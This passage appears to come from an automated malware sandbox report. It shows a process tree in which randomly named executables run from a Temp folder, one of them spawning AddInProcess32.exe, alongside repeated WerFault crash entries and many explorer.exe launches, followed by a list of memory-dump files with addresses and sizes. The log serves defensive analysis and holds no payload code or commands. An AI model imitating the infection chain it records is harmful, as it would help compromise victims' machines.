                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4652 -s 856
                                                                                                                      2⤵
                                                                                                                      • Program crash
                                                                                                                      PID:4584
                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4652 -s 900
                                                                                                                      2⤵
                                                                                                                      • Program crash
                                                                                                                      PID:5836
                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4652 -s 928
                                                                                                                      2⤵
                                                                                                                      • Program crash
                                                                                                                      PID:588
                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4652 -s 960
                                                                                                                      2⤵
                                                                                                                      • Program crash
                                                                                                                      PID:5496
                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4652 -s 1092
                                                                                                                      2⤵
                                                                                                                      • Program crash
                                                                                                                      PID:5324
                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4652 -s 1128
                                                                                                                      2⤵
                                                                                                                      • Program crash
                                                                                                                      PID:5788
                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4652 -s 1140
                                                                                                                      2⤵
                                                                                                                      • Program crash
                                                                                                                      PID:5492
                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4652 -s 1196
                                                                                                                      2⤵
                                                                                                                      • Program crash
                                                                                                                      PID:4556
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\866F.exe
                                                                                                                    C:\Users\Admin\AppData\Local\Temp\866F.exe
                                                                                                                    1⤵
                                                                                                                      PID:5892
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\9005.exe
                                                                                                                      C:\Users\Admin\AppData\Local\Temp\9005.exe
                                                                                                                      1⤵
                                                                                                                        PID:5976
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\993D.exe
                                                                                                                        C:\Users\Admin\AppData\Local\Temp\993D.exe
                                                                                                                        1⤵
                                                                                                                          PID:5424
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\9EAD.exe
                                                                                                                          C:\Users\Admin\AppData\Local\Temp\9EAD.exe
                                                                                                                          1⤵
                                                                                                                            PID:5340
                                                                                                                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                              C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                              2⤵
                                                                                                                                PID:4524
                                                                                                                            • C:\Windows\SysWOW64\explorer.exe
                                                                                                                              C:\Windows\SysWOW64\explorer.exe
                                                                                                                              1⤵
                                                                                                                                PID:5324
                                                                                                                              • C:\Windows\explorer.exe
                                                                                                                                C:\Windows\explorer.exe
                                                                                                                                1⤵
                                                                                                                                  PID:5692
                                                                                                                                • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                  C:\Windows\SysWOW64\explorer.exe
                                                                                                                                  1⤵
                                                                                                                                    PID:5732
                                                                                                                                  • C:\Windows\explorer.exe
                                                                                                                                    C:\Windows\explorer.exe
                                                                                                                                    1⤵
                                                                                                                                      PID:5400
                                                                                                                                    • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                      C:\Windows\SysWOW64\explorer.exe
                                                                                                                                      1⤵
                                                                                                                                        PID:200
                                                                                                                                      • C:\Windows\explorer.exe
                                                                                                                                        C:\Windows\explorer.exe
                                                                                                                                        1⤵
                                                                                                                                          PID:5172
                                                                                                                                        • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                          C:\Windows\SysWOW64\explorer.exe
                                                                                                                                          1⤵
                                                                                                                                            PID:4960
                                                                                                                                          • C:\Windows\explorer.exe
                                                                                                                                            C:\Windows\explorer.exe
                                                                                                                                            1⤵
                                                                                                                                              PID:4932
                                                                                                                                            • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                              C:\Windows\SysWOW64\explorer.exe
                                                                                                                                              1⤵
                                                                                                                                                PID:6084
                                                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                                                C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                                                                1⤵
                                                                                                                                                  PID:6020
                                                                                                                                                • \??\c:\windows\system32\svchost.exe
                                                                                                                                                  c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
                                                                                                                                                  1⤵
                                                                                                                                                    PID:5456
                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\1A27.exe
                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\1A27.exe
                                                                                                                                                    1⤵
                                                                                                                                                      PID:4220

                                                                                                                                                    Network

                                                                                                                                                    MITRE ATT&CK Enterprise v6

                                                                                                                                                    Replay Monitor

                                                                                                                                                    Loading Replay Monitor...

                                                                                                                                                    Downloads

                                                                                                                                                    • memory/964-240-0x0000028D5D180000-0x0000028D5D1F0000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      448KB

                                                                                                                                                    • memory/1008-232-0x00000133CC560000-0x00000133CC5D0000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      448KB

                                                                                                                                                    • memory/1064-238-0x0000021D7A270000-0x0000021D7A2E0000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      448KB

                                                                                                                                                    • memory/1084-119-0x00000000001E0000-0x00000000001E1000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      4KB

                                                                                                                                                    • memory/1236-246-0x00000145B3CA0000-0x00000145B3D10000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      448KB

                                                                                                                                                    • memory/1260-248-0x00000261A8860000-0x00000261A88D0000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      448KB

                                                                                                                                                    • memory/1368-242-0x00000235F9560000-0x00000235F95D0000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      448KB

                                                                                                                                                    • memory/1808-147-0x0000000000DE2000-0x0000000000DE4000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      8KB

                                                                                                                                                    • memory/1808-144-0x0000000000DE0000-0x0000000000DE2000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      8KB

                                                                                                                                                    • memory/1808-150-0x0000000000DE5000-0x0000000000DE7000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      8KB

                                                                                                                                                    • memory/1808-148-0x0000000000DE4000-0x0000000000DE5000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      4KB

                                                                                                                                                    • memory/1824-244-0x0000018F53040000-0x0000018F530B0000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      448KB

                                                                                                                                                    • memory/2292-222-0x00000294FF060000-0x00000294FF0D0000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      448KB

                                                                                                                                                    • memory/2336-236-0x0000023ABF850000-0x0000023ABF8C0000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      448KB

                                                                                                                                                    • memory/2364-152-0x00000000008E5000-0x00000000008E6000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      4KB

                                                                                                                                                    • memory/2364-146-0x00000000008E0000-0x00000000008E2000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      8KB

                                                                                                                                                    • memory/2364-149-0x00000000008E2000-0x00000000008E4000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      8KB

                                                                                                                                                    • memory/2376-234-0x000001565C440000-0x000001565C4B0000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      448KB

                                                                                                                                                    • memory/2536-228-0x0000018121CD0000-0x0000018121D40000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      448KB

                                                                                                                                                    • memory/2572-123-0x0000000002AA0000-0x0000000002AA2000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      8KB

                                                                                                                                                    • memory/2624-211-0x0000024DE5D70000-0x0000024DE5DBB000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      300KB

                                                                                                                                                    • memory/2624-214-0x0000024DE6610000-0x0000024DE6680000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      448KB

                                                                                                                                                    • memory/2632-224-0x0000022E04A00000-0x0000022E04A70000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      448KB

                                                                                                                                                    • memory/2764-312-0x0000000002700000-0x0000000002715000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      84KB

                                                                                                                                                    • memory/2764-309-0x0000000001F10000-0x0000000001F27000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      92KB

                                                                                                                                                    • memory/3104-126-0x0000000000400000-0x0000000000416000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      88KB

                                                                                                                                                    • memory/3888-145-0x0000000000EB0000-0x0000000000EB2000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      8KB

                                                                                                                                                    • memory/3940-131-0x00000000001E0000-0x00000000001E1000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      4KB

                                                                                                                                                    • memory/4044-114-0x0000000000400000-0x000000000042B000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      172KB

                                                                                                                                                    • memory/4368-265-0x0000000000400000-0x0000000002BF4000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      40.0MB

                                                                                                                                                    • memory/4368-264-0x0000000002D20000-0x0000000002E6A000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      1.3MB

                                                                                                                                                    • memory/4488-257-0x0000000000490000-0x00000000004A2000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      72KB

                                                                                                                                                    • memory/4488-256-0x00000000001F0000-0x0000000000200000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      64KB

                                                                                                                                                    • memory/4508-157-0x00000000001F0000-0x0000000000200000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      64KB

                                                                                                                                                    • memory/4508-158-0x00000000008D0000-0x00000000008E2000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      72KB

                                                                                                                                                    • memory/4628-209-0x0000000004400000-0x0000000004501000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      1.0MB

                                                                                                                                                    • memory/4628-213-0x0000000004360000-0x00000000043BC000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      368KB

                                                                                                                                                    • memory/4748-289-0x0000000006EF0000-0x0000000006EF1000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      4KB

                                                                                                                                                    • memory/4748-284-0x0000000006B50000-0x0000000006B51000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      4KB

                                                                                                                                                    • memory/4748-304-0x0000000008000000-0x0000000008001000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      4KB

                                                                                                                                                    • memory/4748-303-0x00000000081E0000-0x00000000081E1000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      4KB

                                                                                                                                                    • memory/4748-292-0x0000000007840000-0x0000000007841000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      4KB

                                                                                                                                                    • memory/4748-290-0x00000000070D0000-0x00000000070D1000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      4KB

                                                                                                                                                    • memory/4748-317-0x0000000006B53000-0x0000000006B54000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      4KB

                                                                                                                                                    • memory/4748-291-0x00000000077D0000-0x00000000077D1000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      4KB

                                                                                                                                                    • memory/4748-282-0x0000000004500000-0x0000000004501000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      4KB

                                                                                                                                                    • memory/4748-283-0x0000000007190000-0x0000000007191000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      4KB

                                                                                                                                                    • memory/4748-301-0x0000000007140000-0x0000000007141000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      4KB

                                                                                                                                                    • memory/4748-285-0x0000000006B52000-0x0000000006B53000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      4KB

                                                                                                                                                    • memory/4840-165-0x0000000003550000-0x0000000003560000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      64KB

                                                                                                                                                    • memory/4840-171-0x00000000036F0000-0x0000000003700000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      64KB

                                                                                                                                                    • memory/4940-300-0x0000000002D90000-0x0000000002D99000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      36KB

                                                                                                                                                    • memory/4940-302-0x0000000000400000-0x0000000002BA8000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      39.7MB

                                                                                                                                                    • memory/5236-276-0x000001FF30300000-0x000001FF303FF000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      1020KB

                                                                                                                                                    • memory/5236-231-0x000001FF2DC40000-0x000001FF2DCB0000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      448KB

                                                                                                                                                    • memory/5440-318-0x0000000004FE0000-0x0000000004FE1000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      4KB

                                                                                                                                                    • memory/5440-326-0x0000000004FE3000-0x0000000004FE4000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      4KB

                                                                                                                                                    • memory/5440-319-0x0000000004FE2000-0x0000000004FE3000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      4KB

                                                                                                                                                    • memory/5444-294-0x0000000002F30000-0x0000000002F3C000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      48KB

                                                                                                                                                    • memory/5476-293-0x0000000000400000-0x000000000040C000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      48KB

                                                                                                                                                    • memory/5820-311-0x0000000000400000-0x0000000002FD0000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      43.8MB

                                                                                                                                                    • memory/5820-310-0x00000000051F0000-0x0000000005AFB000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      9.0MB